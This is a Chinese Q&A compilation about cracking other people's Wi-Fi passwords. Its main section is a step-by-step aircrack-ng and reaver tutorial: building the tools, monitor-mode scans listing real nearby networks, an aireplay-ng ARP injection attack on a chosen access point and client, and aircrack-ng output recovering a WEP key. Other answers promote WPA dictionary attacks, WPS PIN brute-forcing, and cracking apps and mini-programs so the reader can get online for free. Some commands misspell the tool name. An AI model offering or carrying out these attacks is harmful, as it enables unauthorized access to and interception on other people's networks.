1. kali linux 怎么开wifi
如果是破解WEP,直接使用BT3,其他也可以,我就不说了。如果是破解WPA2,WPA可以使用小胖,奶瓶,BT,CDLINUX……部分需要抓包,部分直接跑字典,字典分两种,一个是文档式,还有就是几个G,十几个G的了。。EWSA也可以,这是个专门破包的,对了,微软下,尽量不要使用抓包,破解等等,效果甚微。再就是一款破解路由器的WPSPIN码的工具,REAVER,小工具,跑上几天,或者十几个小时,安装上连PIN上网的软件,接好无线网卡,属于账号,PIN码,你就上网吧,不要钱哦。这些都是要在LINUX下运行的,作为黑客,破解密码是第一步哦,尤其是无线网络密码。对于高手来说,没有任何网络是安全的,也没有密码是不能拟运算破解出来的。
2. 怎么破解WIFI,求解
vivo手机系统没有内置WiFi破解功能,建议到应用商店下载第三方软件使用。
3. wifi有加密要怎么破解
手机怎么破解加密wifi
科技小怪兽
赞同:0
|
2019-02-11
16:25+关注
1、想要使用手机破解已经加密了的wifi,可以使用第三方的wifi密码破解器,一般情况下,在手机应用商店下载了这类app并且安装之后,只需要打开进行连接附近已经加密的wifi就可以了,对于密码比较简单的wifi会比较容易破解。
2、除了可以使用软件进行wifi密码的破解之外,也是可以通过小程序进行破解wifi密码的,打开手机微信之后,点击微信页面右上角的搜索图标后并选择小程序,然后直接输入相关破解wifi的小程序名称进行搜索就可以了,搜索到了小程序直接点击进入点击需要连接的wifi后能破解的就会出现wifi密码,破解了密码之后输入密码进行连接就可以了。
当然了,上述两种方法都是通过wifi破解神器进行破解密码进行连接的,但需要注意的是,这些只能够破解密码比较简单的wifi,有些用户的wifi密码会设置的比较复杂,比较复杂的密码是无法破解的。
而对于无法进行破解的wifi密码来说就比较难办了,不过对于很多用户来说也是比较简单的,首先在很多公共场所,虽然wifi密码无法破解,但是在用户连接了wifi之后,需要打开浏览器输入手机号获取验证码进行登陆,这样不用破解就可以直接连接了。
4. linux可以破解wife密码吗
一. 软硬件环境
硬件: cubieboard2
系统: debian (理论上基于debian的操作系统都可以, 如ubuntu, lubuntu, 等等)
无线网卡: RT3070_usb (其它无线网卡是否支持抓包以及驱动的安装方法请自行谷歌)
由于以下所有工具的编译都是直接在cubieboard里进行的, 所以要在cubieboard里构建编译环境:
# apt-get install gcc make
rt3070驱动安装:
# apt-get install firmware-ralink
二. 安装aircrack-ng
1. 下载aircrack-ng源码
# wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
# tar -zxvf aircrack-ng-1.1.tar.gz
2. 安装必要的库文件
# apt-get install libssl-dev
否则编译时会报错:
In file included from aircrack-ng.c:65:0:
crypto.h:12:26: fatal error: openssl/hmac.h: No such file or directory
compilation terminated.
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/home/code/wifi/aircrack-ng-1.1/src'
make: *** [all] Error 2
3. 修改编译配置文件
# vi common.mak
搜索Werror这行, 将:
CFLAGS ?= -g -W -Wall -Werror -O3
改成:
CFLAGS ?= -g -W -Wall -O3
否则编译时报错:
Linux.c: In function ‘is_ndiswrapper’:
linux.c:165:17: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_rate’:
linux.c:334:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_channel’:
linux.c:807:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_freq’:
linux.c:896:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘set_monitor’:
linux.c:1022:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘do_linux_open’:
linux.c:1366:12: error: variable ‘unused_str’ set but not used [-Werror=unused-but-set-variable]
linux.c:1352:15: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘get_battery_state’:
linux.c:1982:35: error: variable ‘current’ set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors
make[3]: *** [linux.o] Error 1
4. 编译,安装
# make
# make install
三. 安装reaver(穷举PIN码方式破解工具)
1. 下载reaver源码
http://code.google.com/p/reaver-wps/downloads/list
2. 安装必要的库文件
# apt-get install libpcap-dev libsqlite3-dev
否则configure的时候报错:
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
3. 编译,安装
# cd src
# ./configure
# make
# make install
四. 安装minidwep-gtk(图形界面工具, 可选)
deb包, 直接下载安装即可, 本文只专注于纯命令行破解, 图形工具安装步骤略
五. 破解步骤
1. 安装wireless-tools
# apt-get install wireless-tools iw
否则在使用airmon-ng命令时会报错:
Wireless tools not found
或者
ERROR: Neither the sysfs interface links nor the iw command is available.
2. 查看自己的无线网卡的名称,一般是wlan0或者wifi0
# ifconfig -a
3. 开启无线网卡监控功能
# airmon-ng start wlan0
注:wlan0为你的无线设备名称
这一步可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX, XXX为给出的进程号,然后重新执行上句, 直到不报错
4. 选择要破解的wifi, 获取其SSID, MAC, CHANNEL
4.1 用airomp-ng扫描
# airomp-ng mon0
会列出所有扫描到的AP列表, 如:
CH 13 ][ Elapsed: 1 min ][ 2014-05-03 23:32
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1D:0F:6A:0A:F6 -1 0 0 0 108 -1
00:23:CD:26:4A:B8 -59 19 20 0 6 54 . WEP WEP MERCURY
08:18:1A:89:D8:8C -63 19 0 0 1 54e WPA CCMP PSK ChinaNet-HbDm
EC:17:2F:B9:18:32 -77 11 0 0 6 54e. WPA2 CCMP PSK
08:10:76:6D:9B:74 -78 13 0 0 6 54e WPA2 CCMP PSK ZBH
F0:7D:68:55:AF:F4 -77 11 1 0 6 54e WPA2 CCMP PSK TL
AC:6E:1A:73:D7:85 -80 10 0 0 11 54e WPA2 CCMP PSK ChinaNet-43Bs
62:6E:1A:73:D7:86 -79 13 0 0 11 54e WPA2 CCMP PSK iTV-43Bs
A8:15:4D:13:0F:28 -78 19 1 0 11 54 . WPA2 CCMP PSK 2-703_TPLINK
38:83:45:7C:FE:00 -80 5 0 0 6 54e. WPA2 CCMP PSK xiaoer
20:DC:E6:F1:F1:82 -81 11 0 0 6 54e. WPA2 CCMP PSK XMing
6C:E8:73:5B:A3:2A -81 16 0 0 1 54e. WPA2 CCMP PSK HUANG
C8:3A:35:32:BA:88 -81 8 0 0 8 54e WPA CCMP PSK LYX
14:E6:E4:43:66:CA -81 2 0 0 4 54e. WPA2 CCMP PSK TP-LINK_4366CA
D8:15:0D:4D:18:18 -82 7 0 0 3 54e WPA2 CCMP PSK TP-LINK_805
8C:BE:BE:23:A5:AC -82 7 0 0 3 54e WPA2 CCMP PSK Xiaomi_las
9C:D2:4B:44:8B:68 -83 5 0 0 8 54e WPA CCMP PSK ChinaNet-bwwg
08:10:74:AB:61:7E -82 6 0 0 6 54 WPA TKIP PSK Netcore
00:1E:2A:67:EF:B0 -84 13 0 0 11 54 . WPA2 CCMP PSK SecondBegining
28:2C:B2:2C:A8:5C -84 20 0 0 11 54e. WPA2 CCMP PSK TP407
04:8D:38:00:A8:CB -21 47 181 0 7 54e WPA2 CCMP PSK
BSSID STATION PWR Rate Lost Packets Probes
00:1D:0F:6A:0A:F6 E0:B9:A5:05:D2:3D -76 0 - 1 19 6
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -1 48 - 0 0 16
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -80 0 - 2 20 8
04:8D:38:00:A8:CB 00:1D:E0:4B:DF:F1 -78 0e-12e 0 179
选取一个信号好的, 连接的客户端活跃的就可以.
如果想破解WEP, 我们选取的AP信息:
SSID : MERCURY
MAC : 00:23:CD:26:4A:B8
CHANNEL : 6
ENC : WEP
如果想破解WPA/WPA2, 我们选取的AP信息:
SSID :
MAC : 04:8D:38:00:A8:CB
CHANNEL : 7
ENC : WPA2
4.2 这一步用wireless-tools或者windows下的工具WirelessMon也可以
5. 破解WEP
5.1 抓取足够的通信数据包
# airomp-ng --ivs -w packet -c 6 wlan0
或者
# airomp-ng --ivs -w packet -c 6 --bssid 00:23:CD:26:4A:B8 wlan0 //可以加--bssid参数限定只抓特定AP的数据包
参数解释:
--ivs 这里的设置是通过设置过滤,不再将所有无线数据保存,而只是保存可用于破解的IVS数据报文,这样可以有效地缩减保存的数据包大小;
-c 这里我们设置目标AP的工作频道,通过刚才的观察,我们要进行攻击的无线路由器channel为6;
-w 后跟要保存的文件名,所以输入自己希望保持的文件名, 这里会生成packet-xx.ivs文件, xx是序号。后文中破解时使用ivs包可用通配符代替, 如packet-*.ivs
抓包界面如下:
CH 6 ][ Elapsed: 12 mins ][ 2014-05-04 00:23
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:8D:38:00:A8:CB -24 0 3 3 0 7 54e WPA2 CCMP PSK [email protected]
00:23:CD:26:4A:B8 -59 46 582 729 0 6 54 . WEP WEP MERCURY
EC:17:2F:B9:18:32 -75 65 458 139 1 6 54e. WPA2 CCMP PSK TARO
F0:7D:68:55:AF:F4 -78 43 461 24 0 6 54e WPA2 CCMP PSK TL
20:DC:E6:F1:F1:82 -80 33 367 0 0 6 54e. WPA2 CCMP PSK XMing
8C:21:0A:18:17:46 -78 74 513 3 0 6 54e. WPA2 CCMP PSK VincentKasim
38:83:45:7C:FE:00 -79 36 399 0 0 6 54e. WPA2 CCMP PSK xiaoer
08:10:74:AB:61:7E -82 1 261 0 0 6 54 WPA TKIP PSK Netcore
08:10:76:6D:9B:74 -82 27 277 0 0 6 54e WPA2 CCMP PSK ZBH
00:25:86:66:42:6E -83 4 19 0 0 6 54 . WEP WEP FAST_66426E
00:87:15:25:85:2C -83 90 508 18 0 6 54e WPA2 CCMP PSK RT8888
14:E6:E4:56:E2:B6 -83 0 29 0 0 6 54e. WEP WEP pig
40:16:9F:76:82:A2 -84 0 1 0 0 6 22e. WPA2 CCMP PSK WH
38:83:45:CA:42:26 -84 0 1 0 0 6 54e. WPA2 CCMP PSK tp-link n1
BSSID STATION PWR Rate Lost Packets Probes
04:8D:38:00:A8:CB 88:E3:AB:A9:23:96 -80 0 - 1e 0 152
00:23:CD:26:4A:B8 D0:22:BE:EE:E8:A4 -76 54 - 1 0 82
00:23:CD:26:4A:B8 5C:51:4F:CA:4F:09 -82 54 - 1 0 763
5.2 对目标AP使用ArpRequest注入攻击
若连接着该无线路由器/AP的无线客户端正在进行大流量的交互,比如使用迅雷、电骡进行大文件下载等,则可以依靠单纯的抓包就可以破解出WEP密码。
但是无线黑客们觉得这样的等待有时候过于漫长,于是就采用了一种称之为“ARP Request”的方式来读取ARP请求报文,并伪造报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程,
这种方法就称之为ArpRequest注入攻击。输入命令(新开一个终端)如下:
# aireplay-ng -3 -b [AP's MAC] -h [Client's MAC] mon0
参数解释:
-3 指采用ARPRequesr注入攻击模式;
-b 后跟AP的MAC地址,这里就是前面我们探测到的SSID为TPLINK的AP的MAC;
-h 后跟客户端的MAC地址,也就是我们前面探测到的有效无线客户端的MAC;
例如
# aireplay-ng -3 -b 00:23:CD:26:4A:B8 -h D0:22:BE:EE:E8:A4 mon0
回车后将会看到如下所示的读取无线数据报文,从中获取ARP报文的情况出现。
The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airomp-ng to capture replies.
Read 3943 packets (got 0 ARP requests and 13 ACKs), sent 0 packets...(0 pps)
在等待片刻之后,一旦成功截获到ARP请求报文,我们将会看到如下图13所示的大量ARP报文快速交互的情况出现。
The interface MAC (48:02:2A:42:52:F9) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether D0:22:BE:EE:E8:A4
23:55:00 Waiting for beacon frame (BSSID: 00:23:CD:26:4A:B8) on channel 6
Saving ARP requests in replay_arp-0503-235500.cap
You should also start airomp-ng to capture replies.
Read 13943 packets (got 1 ARP requests and 131 ACKs), sent 12 packets...(566 pps)
Read 14045 packets (got 40 ARP requests and 231 ACKs), sent 123 packets...(566 pps)
Read 14132 packets (got 132 ARP requests and 452 ACKs), sent 234 packets...(566 pps)
Read 14212 packets (got 156 ARP requests and 645 ACKs), sent 567 packets...(566 pps)
Read 14223 packets (got 196 ARP requests and 1090 ACKs), sent 845 packets...(566 pps)
此时回到airomp-ng的界面查看,作为MERCURY的packets栏的数字在飞速递增, 一般该值达到1万5千以上, 就可以进行下一步的破解, 很复杂的密码需要8万以上的IVS。
5.3 使用aircrack-ng破解WEP
在抓取的无线数据报文达到了一定数量后,一般都是指IVs值达到1万以上时,就可以开始破解,若不能成功就等待数据报文的继续抓取然后多试几次。
注意,此处不需要将进行注入攻击的终端关闭,而是另外开一个终端进行同步破解。输入命令如下:
# aircrack-ng 捕获的ivs文件
例如:
# aircrack-ng packet-*.ivs
关于ivs的值数量,我们可以从如下所示的界面中看到,当前已经接受到的IVs已经达到了1万5千以上,aircrack-ng已经尝试了16万个组合。
Aircrack-ng 1.1
[00:01:01] Tested 163814 keys (got 15081 IVs)
KB depth byte(vote)
0 55/ 61 AA(13248) 39(13212) BC(13212) CE(13212) 79(13208) EB(13200) 04(13128) 61(13124) 57(13088) 4F(13060) C9(13048) 75(13024) 8F(12984) A4(12984)
1 12/ 14 49(14740) 88(14628) 86(14564) D8(14520) 7C(14272) 5B(14192) 22(14160) 10(14120) 05(14040) 0E(14012) A8(13976) 87(13932) E2(13828) 5D(13796)
2 38/ 2 09(13724) ED(13608) 40(13600) 24(13572) 7E(13572) C0(13572) 50(13560) 06(13492) 97(13432) C6(13432) 23(13392) 0B(13388) B2(13316) AB(13312)
3 2/ 3 9E(16764) A8(15876) 7A(15808) 12(15800) 4B(15740) 28(15440) 53(15368) 16(15036) 69(14936) 5E(14920) 91(14892) 74(14780) 45(14772) 99(14604)
4 16/ 4 7B(14488) 4A(14384) F1(14308) 86(14228) A1(14228) 5C(14128) 17(14120) 6C(14120) 7F(14088) 02(14084) 31(14052) BF(14016) C1(14008) 0C(14004)
KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
Decrypted corretly: 100%
注意: 高强度复杂密码破解成功依赖于更多的IVs, 如13位复杂密码需要8万多IVs.
5. 请问在kali linux下怎么破解Wi
手机Wifi密码查看方法一:RE管理器查看手机Wifi密码
1、采用RE管理器查看手机Wifi密码,需要在手机ROOT之后,然后在手机中下载安装RE管理器
2、安装了RE管理器之后,我们再使用RE管理器或es文件浏览器进入data/misc/wifi目录,
3、最后我们再在wifi目录里找到wpa_supplicant.conf文件,然后使用文本查看器打开查看,在这里变即可查看到所有之前我们手机连接过的Wifi密码,
由于这个文件打开的全是英文代码,可能很多朋友看不懂,这里电脑百事网小编简单介绍下,我们主要查看ssid、psk信息即可。其中ssid=这里显示的是连接过的wifi名称,psk=这里就是我们需要查看的手机Wifi密码了。
手机Wifi密码查看方法二:使用Wi-Fi连接管理器查看手机Wifi密码
1、在手机中下载安装“Wifi连接管理器”应用工具,可以去应用市场或者网络搜索,去下载安装。
2、打开Wifi连接管理器之后,我们就可以看到,手机之前连接过的所有WiFI网络名称,
3、接下里找到需要查看Wifi密码的名称,之后点击打开WiFi名称,可看到有“显示密码”这个选项,
4、最后我们就轻松的查看到手机Wifi密码了!!!
6. cdlinux系统自带的字典无法破解无线密码怎么办
不少朋友都希望找到一篇破解WiFi密码的文章,今天我就为大家准备一篇实战型的文章,图文并茂详细介绍从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描、WPA密码类型该如何破解、字典该怎样做(WEP加密的密码貌似可以直接破解不用字典)效果比BT8要强悍很多!对破解使用U盘破解WiFi密码感兴趣的朋友,不妨坐在小板凳上一起来细细研究吧。
提前要准备的东西:
1、U盘一枚,最小1G空间。需进行格式化操作,提前保存内部文件。
2、CDlinux镜像。帖子最后会提供一枚8月最新修改版,共135M。
一、CDlinux U盘启动
在这一步上废了不少功夫,因为CDlinux不支持内置网卡在虚拟机中进行破解,如果你的机器上有外置网卡的话,后面会提供一种方法来介绍该如何操作!
经过测试了grub等各种方法之后,感觉下面这个方法更适合大家,并且制作工具特别小巧,绿色免安装!特点就是利用它将CDlinux安装到U盘上。运行Unetbootin程序。按下图设置:
图文讲解如何用U盘和CDlinux来破解WiFi密码
发行版本上选择BackTrack,该版本就为适合我们的CDlinux运行环境,之后选择下载好的CDlinux镜像,最后选择我们的U盘盘符,记住别选错哈!
点击确定,程序开始制作,这些都是自动的,我们要做的只有等待就成了!
图文讲解如何用U盘和CDlinux来破解WiFi密码
制作完成后,会提示重启,这时我们点退出。暂不重启。